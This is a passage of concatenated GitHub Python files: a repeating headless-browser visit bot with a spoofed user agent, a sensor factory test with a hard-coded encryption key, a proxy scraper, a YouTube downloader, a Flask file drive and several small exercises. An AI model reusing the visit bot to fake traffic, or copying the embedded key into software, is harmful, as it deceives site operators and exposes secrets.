runtime\nprint(\"#############################################\")\nprint(\" RECIOSBOT: Navahasos en er pesho since 2021 \")\nprint(\"By Sergio 'EverythingForATeamMate' Fernandez\")\nprint(\"#############################################\")\nprint(\"- Selected URL is \"+inputArgs.url)\nprint(\"- UserAgent \"+ inputArgs.user_agent + \" will be used.\")\nprint(\"- A number of \"+ str(inputArgs.requests) + \" requests will be done, with a \" + str(inputArgs.interval) + \" seconds between requests\")\nprint(\"#############################################\")\n\n# This function makes the magic\ndef call_shit(url, user_agent):\n # Virtual display and so\n display = Display(visible=0, size=(800, 600))\n display.start()\n # UserAgent magic\n options=Options()\n options.set_preference(\"general.useragent.override\", user_agent)\n # Run the headless browser\n driver = Firefox(options=options)\n driver.get(url)\n driver.quit()\n # Obviously, stop the virtual display\n display.stop()\n\ndef main():\n count = 1\n while count <= inputArgs.requests:\n print(\"==> Request number \" + str(count) + \" of \" + str(inputArgs.requests))\n call_shit(inputArgs.url,inputArgs.user_agent)\n time.sleep(inputArgs.interval)\n count += 1\n print(\"############################################\")\n print(\"## WELL, THAT'S DONE ##\")\n print(\"############################################\")\n\nmain()\n","repo_name":"SergioFernandezCordero/reciosbot","sub_path":"reciosbot.py","file_name":"reciosbot.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36808697521","text":"#!/usr/bin/python3\n# 1\n# Read from serial with data coming from RFM12PI with RFM12_Demo sketch \n# All Emoncms code is released under the GNU Affero General Public License.\n\nimport serial, sys, string, time, struct\n\nimport spidev\n\nimport RPi.GPIO as GPIO\nGPIO.setwarnings(False)\n\nfrom RFM69 import Radio\n\n# Set this to the serial port of UART programmer\n
usb = serial.Serial('/dev/serial/by-id/usb-Silicon_Labs_CP2102_USB_to_UART_Bridge_Controller_0001-if00-port0', 115200) \n\nboard = {'isHighPower': False, 'interruptPin': 22, 'resetPin': None, 'selPin':26, 'spiDevice': 0, 'encryptionKey':\"89txbe4p8aik5kt3\"}\nradio = Radio(43, 5, 210, verbose=False, **board)\n\n# print (radio.init_success)\n\nradio.__enter__()\n\nusb_str = \"\"\nradio_str = \"\"\n\nrx_msg_flag = {}\n\ntimeout = time.time() + 60 # 60 s\n\nwhile 1:\n\n # Read from USB\n if (usb.in_waiting > 0):\n c = usb.read(usb.in_waiting).decode()\n usb_str = usb_str + c\n \n if '\\n' in usb_str:\n usb_str = usb_str.rstrip()\n # print(usb_str)\n inputs = {}\n if usb_str[0:4]==\"temp\":\n #print(usb_str)\n pairs = usb_str.split(\",\")\n for pair in pairs:\n keyval = pair.split(\":\")\n\n inputs[keyval[0]] = keyval[1]\n \n if 'temp' in inputs and 'humidity' in inputs:\n print (\"- SERIAL: temperature: \" + str(inputs.get('temp')) + \" C\")\n print (\"- SERIAL: humidity: \" + str(inputs.get('humidity')) + \" RH\")\n # Check if temp and humidity are in the range 1-100 \n if int(float(inputs.get('temp'))) in range(1,100) and int(float(inputs.get('humidity'))) in range(1,100):\n print(\"SERIAL: PASS\")\n else:\n print(\"SERIAL: **FAIL**\")\n usb_str = \"\"\n \n packet = radio.get_packet()\n if packet:\n # print(packet.sender)\n # print(len(packet.data))\n if packet.sender==23 and len(packet.data)==12:\n unpacked = struct.unpack('hhhhL',bytes(packet.data))\n # print (unpacked)\n temperature = unpacked[0]\n humidity = unpacked[2]\n
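\n # Editor's note: the sender packs four int16s plus an unsigned long into the\n # 12-byte payload, with readings scaled by 10; e.g. unpacked = (215, 0, 487, 0, 123456)\n # decodes to 21.5 C and 48.7 %RH ('hhhhL' is 12 bytes on this 32-bit target).\n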
\n print(\"- RADIO: PASS\")\n print (\"- RADIO temperature: %0.1f C\" % (temperature*0.1))\n print (\"- RADIO humidity: %0.1f RH\" % (humidity*0.1))\n # Check if temp and humidity are in the range 1-100 \n if not int(temperature) in range(10,1000): \n print (\"- Temperature value FAIL\")\n if not int(humidity) in range(10,1000):\n print (\"- Humidity value FAIL\")\n \n sys.exit(0)\n \n if time.time() > timeout:\n break\n time.sleep(0.1)\n\nprint(\"TIMEOUT RADIO: **FAIL**\") \nradio.__exit__()\n","repo_name":"openenergymonitor/factory-test","sub_path":"testscript/test-emonth.py","file_name":"test-emonth.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36593244610","text":"#importing modules..\nimport qrcode, PIL \nfrom PIL import ImageTk,Image\nimport tkinter as tk\nfrom tkinter import ttk,messagebox,filedialog\n\n#functions for qrcode\ndef createQR(*args):\n data = entry.get()\n if data:\n im = qrcode.make(data)\n img = ImageTk.PhotoImage(im)\n qr_canvas.delete(\"all\")\n qr_canvas.create_image(0,0,anchor=tk.NW,image=img)\n qr_canvas.image = img\n else:\n messagebox.showerror(\"Error\",\"Enter any data first!\")\n\ndef saveQR(*args):\n data = entry.get()\n if data:\n img = qrcode.make(data)\n path = filedialog.asksaveasfilename(defaultextension=\".png\")\n if path:\n img.save(path)\n messagebox.showinfo(\"Success\",\"QR code is saved.\")\n else:\n messagebox.showerror(\"Error\",\"Enter any data first!\")\n\n\n# code for GUI\nroot = tk.Tk()\nroot.title(\"QR Code Generator\")\nroot.geometry(\"320x400\")\nroot.config(bg=\"whitesmoke\")\n\nframe1 = tk.Frame(root,bd=2,relief=tk.RAISED,width=300,height=290)\nframe1.place(x=10,y=0)\nframe2 = tk.Frame(root,bd=2,relief=tk.FLAT,width=300,height=100)\nframe2.place(x=10,y=300)\n\ncover_img = ImageTk.PhotoImage(Image.open(\"qr-img-3.png\"))\n\nqr_canvas = tk.Canvas(frame1)\nqr_canvas.create_image(0,0,anchor=tk.NW,image=cover_img)\nqr_canvas.bind(\"<Button-1>\",saveQR)\nqr_canvas.pack(fill=tk.BOTH)\n\nentry = ttk.Entry(frame2,width=35,font=(\"arial\",11),justify=tk.CENTER)\nentry.place(x=5,y=5)\nentry.bind(\"<Return>\",createQR)\n\nbut1 = ttk.Button(frame2,text=\"Create\",width=10,command=createQR)\nbut1.place(x=15,y=50)\nbut2 = ttk.Button(frame2,text=\"Save\",width=10,command=saveQR)\nbut2.place(x=100,y=50)\nbut3 = ttk.Button(frame2,text=\"Exit\",width=10,command=root.quit)\nbut3.place(x=180,y=50)\n\nroot.mainloop()","repo_name":"RahulRemanan97/QR-Code-Generator","sub_path":"qrcode_genrator.py","file_name":"qrcode_genrator.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"28492554545","text":"'''Ex 3. A graduating class is selling raffle tickets to raise money for their\ngraduation ceremony. Build a program to register the names of the people who bought\na ticket. At the end, the program must draw the prize winner and print their name.'''\r\n\r\n\r\nfrom random import choice\r\nlista=[]\r\n\r\n\r\nnome=(input(\"Type 'fim' to finish\\nEnter a name: \"))\r\n\r\nwhile nome != 'fim':\r\n lista.append(nome)\r\n nome=(input(\"Enter a name: \"))\r\n \r\n\r\nsorteio=choice(lista)\r\nprint(f\"The winner is {sorteio}\")\r\n\r\n","repo_name":"DanielKloh/python","sub_path":"sorteio.py","file_name":"sorteio.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"37505937396","text":"from geom import Point, Vector\nfrom intcode import Computer\n\n\ndef parse_output(out):\n layout = [[]]\n for i in out:\n char = chr(i)\n if char == '\\n':\n layout.append([])\n else:\n layout[-1].append(char)\n if char in '<^>V':\n robot = (len(layout[-1]) - 1, len(layout) - 1, char)\n while not layout[-1]:\n layout.pop()\n return layout, robot\n\n\ndef print_board(board):\n print('\\n'.join([''.join(c for c in row) for row in board]))\n\n\ndef valid_index(layout, point):\n return point.y >= 0 and point.y < len(layout) and point.x >=0 and point.x < len(layout[0])\n\n\ndef walk_scaffold(layout, robot):\n direcs = {'>':Vector(1, 0, 0), '<':Vector(-1, 0, 0), '^':Vector(0, -1, 0), 'V':Vector(0, 1, 0)}\n scaffold = '#'\n\n cur_loc = Point(*robot[:2])\n cur_dir = direcs[robot[-1]]\n cur_run = 0\n moves = []\n while True:\n #print(cur_loc, cur_dir)\n next_loc = cur_loc + cur_dir\n if valid_index(layout, next_loc) and layout[next_loc.y][next_loc.x] == scaffold:\n cur_loc = next_loc\n cur_run += 1\n else:\n if cur_run:\n moves.append(cur_run)\n cur_run = 0\n\n # All of the directions are kinda flipped from expected because we're in a coordinate system\n # where +y is down.\n if cur_dir.x == 1:\n left = cur_loc.down\n right = cur_loc.up\n elif cur_dir.x == -1:\n left = cur_loc.up\n right = cur_loc.down\n elif cur_dir.y == 1:\n left = cur_loc.right\n right = cur_loc.left\n elif cur_dir.y == -1:\n left = cur_loc.left\n right = cur_loc.right\n\n if valid_index(layout, left) and layout[left.y][left.x] == scaffold:\n moves.append('L')\n cur_dir = cur_dir.cross(Vector.k())\n elif valid_index(layout, right) and layout[right.y][right.x] == scaffold:\n moves.append('R')\n cur_dir = Vector.k().cross(cur_dir)\n else:\n break\n\n return ','.join(str(i) for i in moves)\n
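\n\n# Editor's note: a worked instance of the turn math above (illustrative):\n# heading +x, Vector(1, 0, 0).cross(Vector.k()) = Vector(0, -1, 0), i.e. a left\n# turn maps east to -y, which is up on this screen because +y points down.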
\n\ndef run(data):\n c = Computer.fromstring(data)\n c.run()\n layout, robot = parse_output(c.output)\n # print_board(layout)\n\n part_a = sum(r * c for r in range(1, len(layout) - 1)\n for c in range(1, len(layout[0]) - 1)\n if {layout[r][c], layout[r + 1][c], layout[r - 1][c], layout[r][c - 1], layout[r][c + 1]} == {'#'})\n\n move_str = walk_scaffold(layout, robot)\n\n # Empirically determined\n sub_a = 'R,10,R,8,L,10,L,10'\n sub_b = 'R,8,L,6,L,6'\n sub_c = 'L,10,R,10,L,6'\n main = move_str.replace(sub_a, 'A').replace(sub_b, 'B').replace(sub_c, 'C')\n\n c = Computer.fromstring(data)\n c.memory[0] = 2\n c.run(main + '\\n' + sub_a + '\\n' + sub_b + '\\n' + sub_c + '\\nn\\n')\n # c.display_ascii()\n return part_a, c.output[-1]\n\n\nif __name__ == '__main__':\n from aocd.models import Puzzle\n\n puz = Puzzle(2019, 17)\n part_a, part_b = run(puz.input_data)\n\n puz.answer_a = part_a\n print(f'Part 1: {puz.answer_a}')\n\n puz.answer_b = part_b\n print(f'Part 2: {puz.answer_b}')\n","repo_name":"dopplershift/advent-of-code","sub_path":"2019/day17.py","file_name":"day17.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"7"} +{"seq_id":"37907522117","text":"import random\r\n\r\n'''1 = rock\r\n2 = paper\r\n3 = scissors '''\r\n\r\nresult = 0\r\n\r\nwhile True:\r\n\twhile True:\r\n\t\tprint(\"What would you like to choose?\")\r\n\t\tprint(\"Say 'S' for Scissors 'P' for Paper and 'R' for Rock \")\r\n\t\tchoice = input()\r\n\t\tout = random.randint(1,3)\r\n\t\tchoice = choice.capitalize()\r\n\t\tif choice == \"S\":\r\n\t\t\tprint(\"You chose Scissors\")\r\n\t\t\tbreak\r\n\t\telif choice == \"P\":\r\n\t\t\tprint(\"You chose Paper\")\r\n\t\t\tbreak\r\n\t\telif choice == \"R\":\r\n\t\t\tprint(\"You chose Rock\")\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\tprint(\"Please just answer 'S','P' or 'R'\")\r\n\t\t\tcontinue\r\n\r\n\tif ((choice == \"S\") and (out == 3)) or ((choice == \"P\") and (out == 2)) or ((choice == \"R\") and (out == 1)):\r\n\t\tprint(\"It's a DRAW\")\r\n\t\t# a draw leaves the score unchanged\r\n\telif ((choice == \"S\") and (out == 2)) or ((choice == \"P\") and (out == 1)) or ((choice == \"R\") and (out == 3)):\r\n\t\tprint(\"You WIN\")\r\n\t\tresult += 1\r\n\telse:\r\n\t\tprint(\"You LOSE\")\r\n\t\tresult -= 1\r\n\r\n\tprint(\"Your score so far is \" + str(result))\r\n\tprint(\"Press any key to keep playing\")\r\n\tinput()\r\n","repo_name":"TeaPanda/python-Rock-Paper-Scissors","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30705630846","text":"#!/usr/bin/env python\n# coding: utf-8\n\"\"\"Interface to logging package.\n\"\"\"\nimport os\nimport sys\nimport logging\n\nclass Logger(object):\n levels = {\n 'debug': logging.DEBUG,\n 'info': logging.INFO,\n 'warn': logging.WARNING,\n 'warning': logging.WARNING,\n 'error': logging.ERROR,\n 'critical': logging.CRITICAL\n }\n\n def __init__(self,\n filename=None, level='info',\n stream_fmt=None,\n file_fmt='%(message)s'\n ):\n if filename is None:\n # Use the name of the main script as the default log name\n filename = os.path.splitext(os.path.basename(sys.argv[0]))[0] + '.log'\n self.logger = logging.getLogger(filename)\n self.logger.setLevel(self.levels[level])\n if stream_fmt is not None:\n sh = logging.StreamHandler()\n sh.setFormatter(logging.Formatter(stream_fmt))\n self.logger.addHandler(sh) \n th = logging.FileHandler(filename=filename, mode='w', encoding='utf-8')\n th.setFormatter(logging.Formatter(file_fmt))\n self.logger.addHandler(th)\n\nclass BraceMessage:\n def __init__(self, fmt, *args, **kwargs):\n self.fmt = fmt\n self.args = args\n self.kwargs = kwargs\n\n def __str__(self):\n return self.fmt.format(*self.args, **self.kwargs)\n
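\n# Editor's note: a usage sketch (illustrative, not part of the original module):\n# log = Logger(level='debug').logger\n# log.debug(BraceMessage(\"step {0} took {1:.2f}s\", 3, 0.5))  # formats lazily via __str__\n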
","repo_name":"vINyLogY/minimisTN","sub_path":"minitn/lib/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"31284010584","text":"from flask import jsonify, redirect, url_for, send_file\nfrom os import walk, remove\nfrom os.path import join, isdir\nfrom subprocess import getoutput\nfrom zipfile import ZipFile\nfrom werkzeug.utils import secure_filename\n\n\nclass Data:\n path = \"data\"\n datatypes = [\"json\", \"yml\", \"txt\"]\n files, dirs = [], []\n\n\nclass Documents:\n path = \"documents\"\n datatypes = [\"html\", \"pdf\", \"md\", \"markdown\", \"ipynb\"]\n files, dirs = [], []\n\n\nclass Pictures:\n path = \"pictures\"\n datatypes = [\"jpg\", \"png\", \"svg\", \"gif\", \"jpeg\"]\n files, dirs = [], []\n\n\nclass Videos:\n path = \"videos\"\n datatypes = [\"mp4\", \"mp3\", \"wmv\", \"mkv\"]\n files, dirs = [], []\n\n\nclass Scripts:\n path = \"scripts\"\n datatypes = [\"py\", \"js\", \"css\", \"sqlite3\", \"sh\"]\n files, dirs = [], []\n\n\nclass Drive:\n data = {}\n folders = {\n f.__name__.casefold(): f() for f in (Data, Documents, Pictures, Videos, Scripts)\n }\n\n def __init__(self, path, fdata, fjson):\n self.path = path\n self.fdata = fdata\n self.json_file = fjson(join(path, \"directory.json\"))\n self.update()\n\n def update(self):\n for name in self.folders:\n folder = self.folders[name]\n folder_data = self.fdata(join(self.path, folder.path))\n folder.files = folder_data[\"files\"]\n folder.dirs = folder_data[\"dirs\"]\n self.data[name] = folder_data\n self.json_file.data = self.data\n self.json_file.save()\n return\n\n def route(self, method, request_data):\n if method == \"POST\":\n files = request_data.files.getlist(\"files[]\")\n for fi in files:\n self.upload(fi)\n return redirect(url_for(\"home\"))\n else:\n file_data = self.get(request_data[\"filename\"])\n if all([key in file_data for key in (\"filename\", \"path\")]):\n return send_file(file_data[\"path\"], download_name=file_data[\"filename\"])\n else:\n return jsonify(file_data)\n\n def get(self, filename):\n data = {}\n not_found = {\"response\": f\"filename with name {filename} not found\"}\n for i in self.folders:\n folder = self.folders[i]\n file_data = list(filter(lambda x: x[\"name\"] == filename, folder.files))\n if file_data:\n data.update(file_data[0])\n return data\n return not_found\n\n def upload(self, file):\n name = file.__dict__[\"filename\"]\n if name:\n filename = secure_filename(filename=name)\n datatype = filename.split('.')[-1]\n path = self.path\n for i in self.folders:\n folder = self.folders[i]\n if datatype in folder.datatypes:\n path = folder.path\n file_path = join(path, filename)\n file.save(file_path)\n self.update()\n return {\"response\": f\"{filename} uploaded to {file_path}\"}\n else:\n return {\"response\": \"No selected file\"}\n\n\nclass Zip:\n\n @staticmethod\n def create(path):\n if isdir(path):\n zip_path = path + \".zip\"\n with ZipFile(zip_path, 'w') as zipObj:\n for folderName, sub_folders, filenames in walk(path):\n for filename in filenames:\n filePath = join(folderName, filename)\n zipObj.write(filePath)\n return {\"filename\": zip_path.split(\"/\")[-1], \"path\": zip_path}\n else:\n return {\"response\": \"folder not found\"}\n\n @staticmethod\n def remove_zip(zip_path):\n remove(zip_path)\n return\n\n @staticmethod\n def get_info_zip(zip_path):\n name = zip_path.split('/')[-1]\n folder_path = zip_path.replace(f\"/{name}\", \"\")\n data = []\n str_data = getoutput(f\"cd {folder_path} && python -m zipfile -l ./{name}\").splitlines()[1:]\n for s in str_data:\n y = s.split()\n print(y)\n data.append({\n \"filename\": y[0],\n \"date\": \" \".join([y[1].replace(\"-\", \"/\"), y[2]]),\n \"size\": y[3]\n })\n print(data)\n return data\n","repo_name":"CircuitalMinds/app","sub_path":"views/drive.py","file_name":"drive.py","file_ext":"py","file_size_in_byte":4209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"10693451230","text":"#! /usr/bin/env python2\nfrom spellbee.spellbee import spellbee\n\n\nif __name__ == '__main__':\n test_sentences = open('eval.txt').readlines()\n iter_string = []\n test_sentences = ['So accustomed was I to his invariable success that the very possibility of his failing had ceased to enter into my hed.']\n for sentence in test_sentences:\n \t#print(type(sentence))\n suggestions = spellbee._correct(sentence)\n print(suggestions)","repo_name":"klekkala/lang_model","sub_path":"tests/test_spell.py","file_name":"test_spell.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"32307208425","text":"import os, shutil, subprocess\nfrom uuid import uuid4\nfrom pytube import YouTube\nfrom colorama import Fore\n\nfrom yt_ripper.cli.loading import loading_bar\n\ndef get_url():\n url = input(Fore.LIGHTWHITE_EX + \"Url: \" + Fore.LIGHTYELLOW_EX + \"\")\n return url\n\ndef download_video(url, path):\n yt = YouTube(url, use_oauth=True , allow_oauth_cache=True)\n print(Fore.BLUE + \"Fetching Video\")\n yt.streams.get_highest_resolution().download(path)\n # filter(progressive=True, file_extension=\"mp4\").first().download(\n # path\n # )\n loading_bar('Downloading video')\n print(Fore.LIGHTBLUE_EX + \"Download Finished :D\")\n\ndef download_audio_win(yt, path):\n print(Fore.BLUE + \"Downloading Audio\")\n video = yt.streams.filter(only_audio=True).first()\n fileDownloaded = video.download(path)\n base, ext = os.path.splitext(fileDownloaded)\n newFile = base + \".mp3\"\n shutil.copy(fileDownloaded, newFile)\n vPath = os.path.join(path, fileDownloaded)\n os.remove(vPath)\n loading_bar()\n\ndef download_audio(yt, path):\n id = uuid4() \n print(Fore.BLUE + \"Downloading...\")\n yt.streams.filter(\n progressive=True, file_extension=\"mp4\"\n ).first().download(path, filename=f\"{id}.mp4\")\n parent_dir = path\n default_filename = f\"{id}.mp4\"\n new_filename = input(\"Enter the new name (with the .mp3 extension): \")\n print(Fore.BLUE + \"Converting to audio\")\n subprocess.run(\n [\n \"ffmpeg\",\n \"-i\",\n os.path.join(parent_dir, default_filename),\n os.path.join(parent_dir, new_filename),\n ],\n stdout=subprocess.DEVNULL,\n stderr=subprocess.STDOUT,\n )\n vid_path = os.path.join(parent_dir, default_filename)\n os.remove(vid_path)\n loading_bar('Finishing conversion')\n
","repo_name":"Atticus64/yt_ripper","sub_path":"yt_ripper/cli/youtube.py","file_name":"youtube.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"52529402","text":"from urllib import quote, unquote\nfrom bs4 import BeautifulSoup\nimport re\nimport requests\n\n\ndef so(q):\n query = quote(q)\n # url = \"https://encrypted.google.com/search?q={0}\".format(query)\n url = \"https://encrypted.google.com/search?q=stackoverflow+{0}\".format(query)\n soup = BeautifulSoup(requests.get(url).text)\n\n answers = soup.findAll(\"h3\", attrs={\"class\": \"r\"})\n if not answers:\n return \":crying_cat_face: Sorry, stackoverflow doesn't have an answer for you :crying_cat_face:\"\n\n # results =\n\n res1 = unquote(re.findall(r\"q=(.*?)&\", str(answers[0]))[0])\n res2 = unquote(re.findall(r\"q=(.*?)&\", str(answers[1]))[0])\n\n # return unquote(re.findall(r\"q=(.*?)&\", str(answer[0]))[0])\n return res1 + \"\\n\" + res2\n\n\ndef on_message(msg, server):\n text = msg.get(\"text\", \"\")\n match = re.findall(r\"!so (.*)\", text)\n if not match: return\n\n return so(match[0])\n","repo_name":"kepler-/ragebot","sub_path":"plugins/stackoverflow.py","file_name":"stackoverflow.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"17902532957","text":"#!/usr/bin/python3\nfrom bs4 import BeautifulSoup\nimport requests\nimport os\nfrom io import open\nimport time\nimport sys\nprint(sys.platform)\nprint('Wait a moment ......')\ntime.sleep(2)\n\nsitio='https://free-proxy-list.net/'\ndef respuesta():\n\tres=requests.get(sitio)\n\tsp=BeautifulSoup(res.content,'lxml')\n\tfd=sp.find_all(\"div\",{'class':\"table-responsive fpl-list\"})\n\tfor i in fd:\n\t\tet=i.find_all('td')\n\t\tprint(et)\n\tfor x in et:\n\t\tfor i in x:\n\t\t\tprint(i)\n\ndef rasp():\n\tres=requests.get(sitio)\n\tsp=BeautifulSoup(res.content,'lxml')\n\tfd=sp.find_all(\"div\",{'class':\"modal-body\"})\n\tprint(fd)\n\tfor y in fd:\n\t\tvariable=y.find('textarea')\n\t\t#print(y)\n\t\tnum=str(variable)\n\t\tabrir=open('proxies.txt','a')\n\t\tabrir.write(num)\n\t\tabrir.close()\n\t\tprint('The proxies have been saved')\nif __name__=='__main__':\n\tprint('a to check the latest proxies\\nb to save them')\n\topcion=input('Enter an option: ')\n\tif opcion == 'a':\n\t\trespuesta()\n\telif opcion =='b':\n\t\trasp()\n\telif opcion =='':\n\t\tprint('the program finished')\n","repo_name":"xelAStone/proxyScrape","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"34299411724","text":"# the program contains a function that shows the goods from the menu\n# that can be purchased with a certain amount of money\n\nmenu = {'product_1': 1, 'product_2': 2, 'product_3': 3, 'product_4': 4}\nmoney = 3\n\n\ndef available(menu, money):\n available_goods = []\n\n for key in menu:\n if menu[key] <= money:\n available_goods.append(key)\n\n return(available_goods)\n\n\nprint(available(menu, money))\n","repo_name":"Slepnev-Vladimir/Worms_project","sub_path":"ex4.py","file_name":"ex4.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"35413281488","text":"from first_algo.mylogger import logger\n\n\ndef _add(a: int, b: int, a_list: list):\n \"\"\"\n First, let's get clear on the difference between a parameter and an argument.\n # parameter: the variable that receives a value passed to the function (the key point is that it is a variable)\n # argument: the input value passed when the function is called\n # def _add(a, b): -> a, b are parameters; _add(1, 2) -> 1, 2 are arguments\n * important: parameters belong to the function definition, arguments to the function call\n\n Here, parameter a arrives as a copy of argument x's value.\n If you look at the address of param a and the address of argument x, you can see they are the same,\n *because everything in Python is treated as an object.\n What you have to watch out for, though, is that parameters and arguments behave differently\n depending on the data type.\n For example, you might expect that assigning a different value to a would change x as well,\n but the value of x does not change.\n param a is, after all, only a copy of argument x, and assigning a different value inside\n the function simply rebinds the name. But now look at a list instead of an int.\n Pass argument x_list, and param a_list arrives as a copy. If you then append a value\n to a_list, x_list has been changed in exactly the same way.\n\n The types a function cannot modify are integers, floats, strings, tuples and so on.\n Such types are called immutable types.\n By contrast, types such as list, dict and set can be modified inside a function,\n so they are called mutable types.\n * important: therefore, when passing an argument to a function in Python, you must stay\n aware of whether that argument is immutable or mutable, and treat the two cases differently.\n\n \"\"\"\n logger.info(\"***start _add function\")\n assert isinstance(a, int) and isinstance(b, int), f\"Type error, {a} or {b} is not int\"\n assert isinstance(a_list, list), f\"Type error, {a_list} is not list\"\n\n logger.info(f\"id - a: {id(a)}\")\n logger.info(f\"id - x: {id(x)}\")\n logger.info(f\"a: {a}\")\n logger.info(f\"x: {x}\")\n\n a = 2\n\n logger.info(f\"a: {a}\")\n logger.info(f\"x: {x}\")\n\n a_list.append(3)\n logger.info(f\"a_list: {a_list}\")\n logger.info(f\"x_list: {x_list}\")\n\n\nif __name__ == '__main__':\n x = 1\n y = 2\n x_list = [1, 2]\n _add(x, y, x_list)\n logger.info(\"***end _add function\")\n
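\n\n# Editor's note: a minimal standalone sketch of the same idea (illustrative):\n# def bump(n: int): n += 1              # rebinds the local name only\n# def grow(nums: list): nums.append(9)  # mutates the caller's object\n# k, vals = 1, [1]\n# bump(k); grow(vals)\n# print(k, vals)  # -> 1 [1, 9]\n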
","repo_name":"pm1100tn/algorithm-practice-python","sub_path":"first_algo/book_1_8_2_pass_by_value_pass_by_reference.py","file_name":"book_1_8_2_pass_by_value_pass_by_reference.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36133087890","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport vtk\r\nfrom vtk.util.numpy_support import vtk_to_numpy\r\n\r\n# read a volume image\r\nreader = vtk.vtkNrrdReader()\r\nreader.SetFileName(\"MRHead.nrrd\")\r\nreader.Update()\r\nimageData = reader.GetOutput()\r\n\r\n# convert from vtkImageData to numpy array\r\nx_dim, y_dim, z_dim = imageData.GetDimensions()\r\nsc = imageData.GetPointData().GetScalars()\r\nimage = vtk_to_numpy(sc)\r\nimage = image.reshape(x_dim, y_dim, z_dim, order='F')\r\nimage = np.rot90(np.flip(image, axis=1))\r\n\r\n# normalize image values\r\nimage = np.divide(image, float(np.max(image)))\r\n\r\n# create a figure\r\nfig = plt.figure(figsize=(16,5))\r\n\r\n\r\n####################\r\n# Task 1a \r\n####################\r\nmaximum_projection = np.max(image, axis=2)\r\nax = fig.add_subplot(1, 3, 1)\r\nax.imshow(maximum_projection, cmap='gray')\r\nax.set_title('Maximum Intensity Projection')\r\n\r\n\r\n\r\n####################\r\n# Task 1b \r\n####################\r\n# I(s) = I(s0) * e^(-tau(s0, s))\r\n\r\ntau = np.sum(image, 2) / image.shape[2] # approximate integral\r\nvolume_rendering_equation = 1 * np.exp(-tau)\r\nvolume_rendering_equation = 1 - volume_rendering_equation\r\nax = fig.add_subplot(1, 3, 2)\r\nax.imshow(volume_rendering_equation, cmap='gray')\r\nax.set_title('Projection using Volume Rendering Equation')\r\n\r\n####################\r\n# Task 1c \r\n####################\r\ngamma = 0\r\nalpha = 0.06\r\n\r\nC = np.zeros(image[:,:,0].shape)\r\na = np.zeros(image[:,:,0].shape)\r\ncurrent_max = np.zeros(image[:,:,0].shape)\r\n\r\nfor i in range(image.shape[2]):\r\n delta = image[:,:,i] - current_max # gain over the running maximum so far\r\n delta[delta < 0] = 0\r\n current_max = np.maximum(current_max, image[:,:,i]) # update current maximum along ray\r\n if gamma <= 0:\r\n beta = 1 - delta*(1+gamma)\r\n else:\r\n beta = 1 - delta\r\n C = beta*C + (1 - beta*a)*image[:,:,i]\r\n a = beta*a + (1 - beta*a)*alpha\r\n\r\nax = fig.add_subplot(1, 3, 3)\r\nax.imshow(C, cmap='gray')\r\nax.set_title('Projection 
using MIDA')\r\n\r\n# Always run show, to make sure everything is displayed.\r\nplt.show()","repo_name":"toucanmeister/cdsMaster","sub_path":"Semester 2/Visualisierung/ex07/code/task7_1.py","file_name":"task7_1.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7944508034","text":"import numpy as np\nimport math\nimport bisect\nimport matplotlib.pyplot as plt\n\nclass CubicSpline1D:\n \"\"\"\n 1D Cubic Spline class\n Parameters\n ----------\n x : list\n x coordinates for data points. This x coordinates must be\n sorted\n in ascending order.\n y : list\n y coordinates for data points\n \"\"\"\n\n def __init__(self, x, y):\n h = np.diff(x)\n if np.any(h < 0):\n raise ValueError(\"x coordinates must be sorted in ascending order\")\n\n self.a, self.b, self.c, self.d = [], [], [], []\n self.x = x\n self.y = y\n self.nx = len(x) # dimension of x\n\n # calc coefficient a\n self.a = [iy for iy in y]\n\n # calc coefficient c\n A = self.__calc_A(h)\n B = self.__calc_B(h, self.a)\n self.c = np.linalg.solve(A, B)\n\n # calc spline coefficient b and d\n for i in range(self.nx - 1):\n d = (self.c[i + 1] - self.c[i]) / (3.0 * h[i])\n b = 1.0 / h[i] * (self.a[i + 1] - self.a[i]) \\\n - h[i] / 3.0 * (2.0 * self.c[i] + self.c[i + 1])\n self.d.append(d)\n self.b.append(b)\n\n def calc_position(self, x):\n \"\"\"\n Calc `y` position for given `x`.\n if `x` is outside the data point's `x` range, return None.\n Returns\n -------\n y : float\n y position for given x.\n \"\"\"\n if x < self.x[0]:\n return None\n elif x > self.x[-1]:\n return None\n\n i = self.__search_index(x)\n dx = x - self.x[i]\n position = self.a[i] + self.b[i] * dx + \\\n self.c[i] * dx ** 2.0 + self.d[i] * dx ** 